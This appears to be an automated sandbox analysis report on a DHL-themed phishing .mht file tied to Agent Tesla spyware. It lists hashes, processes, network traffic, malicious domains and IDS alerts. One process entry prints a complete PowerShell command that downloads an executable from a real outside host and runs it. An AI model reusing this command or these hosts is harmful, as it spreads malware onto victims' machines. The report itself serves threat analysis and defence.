File name: | dhl_receipt_receipt_sofia.mht |
Full analysis: | https://app.any.run/tasks/02d29ee4-600c-4205-a42b-d8224a4c86ec |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 17, 2019, 10:48:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | ABB4D022686FA1836E4B992F09AB2E72 |
SHA1: | A2D700F2A247F86D417C74CE7A5241FB92891890 |
SHA256: | 7BAD8B7FEB1C0022F724BB75B403740F2E60EA3343ADCF7F693DD4D65AA48BF9 |
SSDEEP: | 6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ93rWNmdofTQNZ8vn:4Q0AQQYf2j3VTr93rsnfTQNav |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\dhl_receipt_receipt_sofia.mht | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3800 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2844 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3484 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2844 CREDAT:137473 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3560 | C:\Windows\System32\mshta.exe -Embedding | C:\Windows\System32\mshta.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2584 | "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','%temp%\vnnv.exe'); Start '%temp%\vnnv.exe' | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3636 | powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','C:\Users\admin\AppData\Local\Temp\vnnv.exe'); Start 'C:\Users\admin\AppData\Local\Temp\vnnv.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4004 | "C:\Program Files\Google\Chrome\Application\chrome.exe" | C:\Program Files\Google\Chrome\Application\chrome.exe | explorer.exe | |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 3221225547 Version: 75.0.3770.100 | ||||
2496 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6910a9d0,0x6910a9e0,0x6910a9ec | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 75.0.3770.100 | ||||
2140 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4000 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 75.0.3770.100 | ||||
3672 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1024,16625597348008449276,6420807082483514861,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=849639120747899630 --mojo-platform-channel-handle=1036 --ignored=" --type=renderer " /prefetch:2 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe |
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 75.0.3770.100 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2844 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3800 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkD4A8.tmp | text | |
MD5:5802850DF1DF6128C5AF93230BC19CD4 | SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 | |||
3484 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\26V38JPY\dhl_receipt_receipt_sofia[1].hta | html | |
MD5:FD9AF6BBDDBC3F7A7457FC9373DF5FCD | SHA256:030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F | |||
3800 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkD32F.tmp | text | |
MD5:5802850DF1DF6128C5AF93230BC19CD4 | SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 | |||
3484 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:66EB1CC5B0E4D739CD5EEA3C4A5CA04F | SHA256:4192244C53BDFD843F4A91B840B21DFF1A11DB2ACFF8D1497547F6C707A75193 | |||
2844 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFB75E2AD70CC326AC.TMP | — | |
MD5:— | SHA256:— | |||
3484 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:F53FE23D5F8EA6FA435BC62E63270170 | SHA256:D592B698F4AE537A334E5C9BAF02620734016B68833BEA1719911E266BD720EF | |||
3800 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071720190718\index.dat | dat | |
MD5:0A03E1A5B3028C65D833A31509B66C3F | SHA256:DD968B2DF0AA1552DCDAD713A6AA9C194346F08BB8F35BDB65C9092E865A280F | |||
3484 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3484 | iexplore.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3560 | mshta.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3216 | RegSvcs.exe | GET | 200 | 52.6.79.229:80 | http://checkip.amazonaws.com/ | US | text | 16 b | shared |
3636 | powershell.exe | GET | 200 | 103.1.208.220:80 | http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe | VN | executable | 1.50 Mb | suspicious |
3988 | chrome.exe | GET | 302 | 216.58.207.46:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx | US | html | 516 b | whitelisted |
3988 | chrome.exe | GET | 200 | 173.194.188.102:80 | http://r1---sn-4g5ednss.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=185.183.107.227&mm=28&mn=sn-4g5ednss&ms=nvh&mt=1563360503&mv=m&mvi=0&pl=24&shardbypass=yes | US | crx | 862 Kb | whitelisted |
2844 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3988 | chrome.exe | 172.217.21.195:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted |
2844 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3636 | powershell.exe | 103.1.208.220:80 | jpf.edu.vn | CHT Compamy Ltd | VN | suspicious |
3988 | chrome.exe | 172.217.18.10:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
3988 | chrome.exe | 172.217.18.99:443 | www.google.com.ua | Google Inc. | US | whitelisted |
3988 | chrome.exe | 172.217.23.142:443 | apis.google.com | Google Inc. | US | whitelisted |
3560 | mshta.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3988 | chrome.exe | 172.217.23.163:443 | www.google.at | Google Inc. | US | whitelisted |
3484 | iexplore.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3988 | chrome.exe | 216.58.205.237:443 | accounts.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
elkom.express |
| suspicious |
jpf.edu.vn |
| suspicious |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
www.google.com.ua |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
www.gstatic.com |
| whitelisted |
fonts.gstatic.com |
| whitelisted |
apis.google.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3484 | iexplore.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3560 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3560 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3560 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3560 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |
3560 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of document.write % Encoding |
3560 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of parseInt % Encoding |
3560 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of unescape % Encoding |
3484 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3484 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |